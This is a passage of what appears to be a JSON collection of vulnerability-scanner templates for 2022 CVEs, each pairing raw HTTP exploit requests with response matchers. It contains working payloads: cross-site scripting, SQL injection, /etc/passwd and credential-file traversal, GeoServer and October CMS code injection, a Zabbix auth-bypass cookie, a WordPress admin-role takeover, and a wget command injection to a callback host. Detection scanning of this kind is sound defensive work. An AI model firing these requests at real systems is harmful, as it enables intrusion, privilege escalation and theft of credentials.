application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /plupload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034\nReferer: {{BaseURL}}admin/view:modules/load_module:files\n\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.xml\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunk\"\n\n0\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunks\"\n\n1\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"file\"; filename=\"blob\"\nContent-Type: application/octet-stream\n\n<x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>\n-----------------------------59866212126262636974202255034--\n","GET /userfiles/media/default/{{to_lower(\"{{randstr}}\")}}.xml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,\"alert(document.domain)\")","status_code_3==200","contains(body_2,\"bytes_uploaded\")"],"condition":"and"}]}]},{"id":"CVE-2022-24816","info":{"name":"GeoServer <1.2.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /geoserver/wms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n  <wps:Execute version=\"1.0.0\" service=\"WPS\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://www.opengis.net/wps/1.0.0\" xmlns:wfs=\"http://www.opengis.net/wfs\" xmlns:wps=\"http://www.opengis.net/wps/1.0.0\" xmlns:ows=\"http://www.opengis.net/ows/1.1\" xmlns:gml=\"http://www.opengis.net/gml\" xmlns:ogc=\"http://www.opengis.net/ogc\" xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n    <ows:Identifier>ras:Jiffle</ows:Identifier>\n    <wps:DataInputs>\n      <wps:Input>\n        <ows:Identifier>coverage</ows:Identifier>\n        <wps:Data>\n          <wps:ComplexData mimeType=\"application/arcgrid\"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999  316]]></wps:ComplexData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>script</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>dest = y() - (500); // */ public class Double {    public static double NaN = 0;  static { try {  java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream())); String line = null; String allLines = \" - \"; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>outputType</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>DOUBLE</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n    </wps:DataInputs>\n    <wps:ResponseForm>\n      <wps:RawDataOutput mimeType=\"image/tiff\">\n        <ows:Identifier>result</ows:Identifier>\n      </wps:RawDataOutput>\n    </wps:ResponseForm>\n  </wps:Execute>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","ExceptionInInitializerError"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31845","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /live_check.shtml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","FW_Version=","LanIP="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42749","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-43140","info":{"name":"kkFileView 4.1.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"],"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2022-1598","info":{"name":"WordPress WPQA <5.5 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/asked-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"rendered\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21705","info":{"name":"October CMS -  Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onSave\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onCreateTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&type=page\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onOpenTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["function onInit()","phpinfo()","Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`."],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"session_key","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[1]"],"attribute":"value"},{"type":"xpath","name":"token","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[2]"],"attribute":"value"},{"type":"regex","name":"theme","group":1,"regex":["<input\\stype=\\\\\"hidden\\\\\"\\svalue=\\\\\"demo\\\\\"\\sname=\\\\\"([^\"]*)\\\\\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1933","info":{"name":"WordPress CDI <5.1.9 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Tracking code not correct"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0952","info":{"name":"WordPress Sitemap by click5 <1.0.36 - Missing Authorization","severity":"high"},"requests":[{"raw":["POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"1\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"default_role\":\"administrator\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"0\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","status_code == 200","contains(body_1, 'users_can_register')","contains(body_2, 'default_role')"],"condition":"and"}]}]},{"id":"CVE-2022-0693","info":{"name":"WordPress Master Elements <=8.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Post Meta Setting Deleted Successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-0424","info":{"name":"Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npage=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"id\":\"","username\":\"","email\":","hash\":\"","_wpnonce"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29383","info":{"name":"NETGEAR ProSafe SSL VPN firmware - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n","POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"User authentication Failed\")","contains(body_2, \"User Login Failed for SSLVPN User.\")"],"condition":"and"}]}]},{"id":"CVE-2022-25149","info":{"name":"WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 50s\nGET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(6)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, 'Visitor Hit was recorded successfully')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-zA-Z]+)"],"internal":true}]}]},{"id":"CVE-2022-31974","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29349","info":{"name":"kkFileView 4.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D"],"matchers-condition":"and","matchers":[{"type":"word","words":["txt\"><img src=111 onerror=alert(1)>123"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21661","info":{"name":"WordPress <5.8.3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ecsload&query={\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"\"]}}}&ecs_ajax_settings={\"post_id\":\"1\", \"current_page\":1, \"widget_id\":1, \"theme_id\":1, \"max_num_pages\":10}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"WordPress database error:\")","contains(body, \"error in your SQL syntax\")"],"condition":"and"}]}]},{"id":"CVE-2022-2488","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0422","info":{"name":"WordPress White Label CMS <2.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php?wlcms-action=preview HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nwlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(/XSS/);"]},{"type":"word","part":"body","words":["wlcms-login-wrapper"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25481","info":{"name":"ThinkPHP 5.0.24 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?s=example"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","REQUEST_TIME","ThinkPHP Constants"],"condition":"and"},{"type":"status","status":[200,500,404],"condition":"or"}]}]},{"id":"CVE-2022-24900","info":{"name":"Piano LED Visualizer 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24856","info":{"name":"Flyte Console <0.52.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cors_proxy/https://oast.me/"],"matchers":[{"type":"word","words":["Interactsh Server"]}]}]},{"id":"CVE-2022-30073","info":{"name":"WBCE CMS 1.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<p><b><script>alert(document.cookie)</script>","WBCECMS"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"formtoken","group":1,"regex":["<input\\stype=\"hidden\"\\sname=\"formtoken\"\\svalue=\"([^\"]*)\"\\s/>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0218","info":{"name":"HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/whm/v3/themesettings"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"background\":","\"footer\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0949","info":{"name":"WordPress Stop Bad Bots <6.930 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=0\n","@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6))\n","GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"commentform\")"],"condition":"and"}]}]},{"id":"CVE-2022-29548","info":{"name":"WSO2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CARBON.showWarningDialog('???');alert(document.domain)//???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0769","info":{"name":"Users Ultra <= 3.1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"You have to be logged in to leave your rate\")"],"condition":"and"}]}]},{"id":"CVE-2022-22242","info":{"name":"Juniper Web Device Manager - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","The requested resource is not authorized to view"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0785","info":{"name":"WordPress Daily Prayer Time <2022.03.01 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"dptTimetable customStyles dptUserStyles\")"],"condition":"and"}]}]},{"id":"CVE-2022-43185","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-36642","info":{"name":"Omnia MPX 1.5.0+r1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd","{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["\"username\":","\"password\":","\"mustChangePwd\":","\"roleUser\":"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-23131","info":{"name":"Zabbix - SAML SSO Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/index_sso.php","{{BaseURL}}/index_sso.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(header), 'location: zabbix.php?action=dashboard.view')"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-31975","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2379","info":{"name":"WordPress Easy Student Results <=2.2.8 - Improper Authorization","severity":"high"},"requests":[{"raw":["GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"departments\":","batches\":"],"condition":"and"},{"type":"word","part":"body_2","words":["meta_data","\"name\":\"","\"registration_no\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0140","info":{"name":"WordPress Visual Form Builder <3.0.8 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin.php?page=vfb-export HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}/wp-admin/admin.php?page=vfb-export\nContent-Type: application/x-www-form-urlencoded\nOrigin: {{RootURL}}\n\nvfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Date Submitted\"","\"Entries ID\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0885","info":{"name":"Member Hero <=1.0.9 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-0660","info":{"name":"Microweber <1.2.11 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:comments\n\nclass=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,'QueryException')","contains(body_2,'SQLSTATE')","contains(body_2,'runQueryCallback')","contains(header_2,\"text/html\")","status_code_2==500"],"condition":"and"}]}]},{"id":"CVE-2022-44949","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0954","info":{"name":"Microweber <1.2.11 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/save_option HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\noption_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother\n","POST /module/ HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\nmodule=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,\"true\")","contains(body_3,'\\\"><img src=\\\"x\\\" onerror=\\\"alert(document.domain);\\\">\\\" placeholder=\\\"Use 